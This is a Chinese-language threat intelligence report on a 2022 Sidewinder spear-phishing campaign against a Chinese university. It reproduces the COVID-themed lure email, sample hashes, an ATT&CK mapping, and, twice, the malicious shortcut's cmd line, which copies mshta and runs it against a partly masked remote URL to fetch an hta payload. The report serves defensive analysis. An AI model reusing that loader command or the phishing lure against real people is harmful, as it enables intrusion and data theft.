事件要點

特征內容

攻擊時間

2022年11月22日

涉及組織

響尾蛇組織

事件概述

響尾蛇組織近期利用疫情題材針對國內高校的魚叉式釣魚攻擊活動

攻擊目標

國內某高校

攻擊手法

魚叉式釣魚攻擊

攻擊意圖

偵察、竊密

事件要點

特征內容

發件人郵箱

陳蕾 <sppmdw@mail.***.edu.cn.ali**.co>

收件人郵箱

gg**@***.edu.cn

郵件發件時間

2022/11/22 (周二) 12:41

郵件標題

公共管理學院關于11月22日起工作安排調整的通知

郵件正文

公共管理學院關于11月22日起工作安排調整的通知

當前北京市疫情正處于快速增長期，校園面臨嚴峻挑戰。為堅決遏制疫情向校園擴散蔓延，全力維護校園安全，根據北京市和***大學關于疫情防控要求和學院實際，對近期工作調整通知如下：

1.   按防控政策有居家要求的教職工，近期不到校，配合屬地要求做好疫情防控，實行居家辦公、線上授課；請居住在校內家屬區的人員減少流動，不前往教學辦公區；請在校學生不前往校內家屬區；其他教職工非必要不到校、靈活辦公，建議盡量居家辦公、線上授課。

2.     學院安排領導每天帶班，各辦公室根據近期工作計劃安排部分人員到崗（見附件名單），確因工作需要進校的教職工，請保持學校與家兩點一線原則，盡量避免與學生有時空交集。

3.     學生嚴格執行“非必要不出校”。進出校申請全部調整為院系審批，原則上暫停審批因學業（上課）、實習和其他原因的臨時出校申請。京內校外居住學生嚴格“非必要不入?！?。校外居住學生轉為線上上課，在京已滿7天且確因實驗室在校內以“科研”事由申請臨時入校的，依據有關要求經院系審批入校，堅持不聚餐、不聚會、不前往人員密集場所。

4.     11月22日至25日，臨時人員原則上不入校，各單位原則上不組織線下會議和活動。各單位從嚴審批。

5.     進出學院大樓要求為：配合樓門值守人員要求進門刷卡、測溫，在公共場所佩戴口罩等。

6.     全體校內教職工和學生按要求完成常態化核酸檢測（自11月22日起調整為“一天一檢”），建議在白天錯峰完成，避免擁堵。居住校外的教職工根據社區安排進行檢測。自11月22日起，進校需查驗24小時內核酸陰性結果。

請全院教職員工和同學理解并嚴格落實學校疫情防控要求。請研究生導師關心關注同學們的學業、就業、心理等方面狀態。

本工作安排將隨著疫情形勢變化和上級要求及時調整。讓我們攜手共筑平安健康校園！

***大學公共管理學院

2022年11月22日

郵件SMTP服務器

e226-5.smtp-out.us-east-2.amazonses.com

附件文件名

公管學院關于11月22日起工作安排調整的通知.zip

附件文件哈希

d0ca92ce29456931ad14aed48******

病毒名稱

Trojan[APT]/ZIP.Sidewinder

原始文件名

公管學院關于11月22日起工作安排調整的通知.zip

MD5

D0CA92CE29456931AD14AED48C3EA93F

文件大小

1.16 KB (1,188 字節)

文件格式

application/zip

最早內容修改時間

2022-11-22 12:40:10 UTC+8

最后內容修改時間

2022-11-22 12:40:10 UTC+8

包含文件內容

公管學院關于11月22日起工作安排調整的通知.docx.lnk

~notification01.tmp

~notification02.tmp

病毒名稱

Trojan[APT]/LNK.Sidewinder

原始文件名

公管學院關于11月22日起工作安排調整的通知.docx.lnk

MD5

5356A1193252B4FB2265FC8AC10327A1

文件大小

1.03 KB (1,055 字節)

文件格式

Windows shortcut

創建時間

2021-04-09 13:42:41 UTC+0

最終訪問時間

2022-11-14 05:53:04 UTC+0

最終修改時間

2021-04-09 13:42:41 UTC+0

硬盤序列號

ba8b-b47a

相對路徑

..\..\..\Windows\System32\cmd.exe

圖標文件名

%SystemRoot%\System32\SHELL32.dll

命令行

C:\Windows\System32\cmd.exe  /q /c  copy /B /Y  C:\Windows\System32\m?ht?.??e  %programdata%\jkli.exe & start /min %programdata%\jkli.exe https://mail***.sina**.co/3679/1/55554/2/0/0/0/m/files-94c98cfb/hta

病毒名稱

Trojan[Cryxos]/JS.Agent

原始文件名

hta

MD5

C5747A607CDAE8C44A7EC11892E0AA25

文件大小

863 KB (884,199 字節)

文件格式

JavaScript

原始文件名

公管學院關于11月22日起工作安排調整的通知.docx

MD5

CF1C0AADA943243FB1F55F02B91D4CB4

文件格式

Document/Microsoft.DOCX[:Word 2007-2013]

文件大小

228 KB (233,821 字節)

創建時間

2022:11:22 03:32:00 UTC+0

最后修改時間

2022:11:22 03:40:00 UTC+0

創建者

Windows User

最后修改者

Windows User

編輯總時間

8 minutes

原始文件名

公管學院關于11月22日起工作安排調整的通知.docx.lnk

?????????????????????  ???????????????, ????.docx.lnk

MD5

5356A1193252B4FB2265FC8AC10327A1

A92A98D9A88060A50F91F56B7FD11E81

文件大小

1.03 KB (1,055 字節)

1.11 KB (1,143 字節)

創建時間

2021-04-09 13:42:41 UTC+0

2021-04-09 13:42:41  UTC+0

最終訪問時間

2022-11-14 05:53:04 UTC+0

2022-11-14 05:53:04 UTC+0

最終修改時間

2021-04-09 13:42:41 UTC+0

2021-04-09 13:42:41  UTC+0

硬盤序列號

ba8b-b47a

ba8b-b47a

包裹打包時間

2022-11-22 04:40:10 UTC+0

2022-11-23 07:50:08  UTC+0

命令行

C:\Windows\System32\cmd.exe  /q /c  copy /B /Y  C:\Windows\System32\m?ht?.??e %programdata%\jkli.exe  & start /min %programdata%\jkli.exe https://mail***.sina**.co/3679/1/55554/2/0/0/0/m/files-94c98cfb/hta

C:\Windows\System32\cmd.exe  /q /c  copy /B /Y  C:\Windows\System32\m?ht?.??e  %programdata%\jkli.exe & start /min %programdata%\jkli.exe https://mailv.***-gov.org/3669/1/24459/2/0/1/1850451727/6JOo39NpphBz5V3XOKZff9AGJH3RNAJuLvBQptc1/files-94603e7f/hta

ATT&CK階段

具體行為

注釋

偵察

搜集受害者網絡信息

搜集受害者的郵箱賬號等網絡信息

搜集受害者組織信息

搜集受害者的工作單位信息

資源開發

獲取基礎設施

注冊攻擊域名、搭建郵件服務器

建立賬戶

創建仿冒的郵箱賬號

初始訪問

網絡釣魚

發送魚叉式釣魚郵件投遞惡意附件

執行

利用命令和腳本解釋器

利用mshta等腳本類解釋器執行惡意代碼

誘導用戶執行

誘餌文件的信息與目標單位疫情防控措施相關

防御規避

混淆文件或信息

JS腳本、掩飾文件和DLL程序的內容都經過加密混淆

發現

發現軟件

發現系統內安裝殺毒軟件的情況

收集

自動收集

自動搜集系統信息

命令與控制

使用應用層協議

木馬使用HTTPS協議進行c2通訊

編碼數據

信息上傳過程中經過URL編碼

數據滲出

自動滲出數據

竊密數據自動滲出

使用C2信道回傳

木馬使用C2信道回傳數據